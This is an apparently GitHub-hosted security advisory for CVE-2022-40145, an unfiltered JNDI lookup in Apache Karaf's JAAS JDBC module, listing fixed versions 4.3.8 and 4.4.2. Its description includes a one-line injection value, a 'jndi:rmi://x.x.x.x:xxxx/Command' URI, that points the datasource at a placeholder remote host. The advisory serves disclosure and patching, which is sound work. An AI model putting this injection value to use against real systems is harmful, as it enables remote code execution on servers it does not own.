ghsa-c2p4-8mvv-rwmv
Vulnerability from github
This vulnerability is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource uses InitialContext.lookup(jndiName) without filtering. A user can modify options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName()); to options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command"); in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. Maintainers encourage the users to upgrade to at least Apache Karaf versions 4.4.2 or 4.3.8.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.karaf:apache-karaf"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.3.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.karaf:apache-karaf"
},
"ranges": [
{
"events": [
{
"introduced": "4.4.0"
},
{
"fixed": "4.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-40145"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-74"
],
"github_reviewed": true,
"github_reviewed_at": "2022-12-21T18:49:57Z",
"nvd_published_at": "2022-12-21T16:15:00Z",
"severity": "CRITICAL"
},
"details": "This vulnerability is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function `jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource` uses `InitialContext.lookup(jndiName)` without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, \"osgi:\" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,\"jndi:rmi://x.x.x.x:xxxx/Command\");` in `JdbcLoginModuleTest#setup`. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. Maintainers encourage the users to upgrade to at least Apache Karaf versions 4.4.2 or 4.3.8.",
"id": "GHSA-c2p4-8mvv-rwmv",
"modified": "2022-12-29T01:07:10Z",
"published": "2022-12-21T18:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40145"
},
{
"type": "WEB",
"url": "https://github.com/apache/karaf/pull/1632"
},
{
"type": "WEB",
"url": "https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1"
},
{
"type": "WEB",
"url": "https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/karaf"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/KARAF-7568"
},
{
"type": "WEB",
"url": "https://karaf.apache.org/security/cve-2022-40145.txt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Apache Karaf vulnerable to potential code injection"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.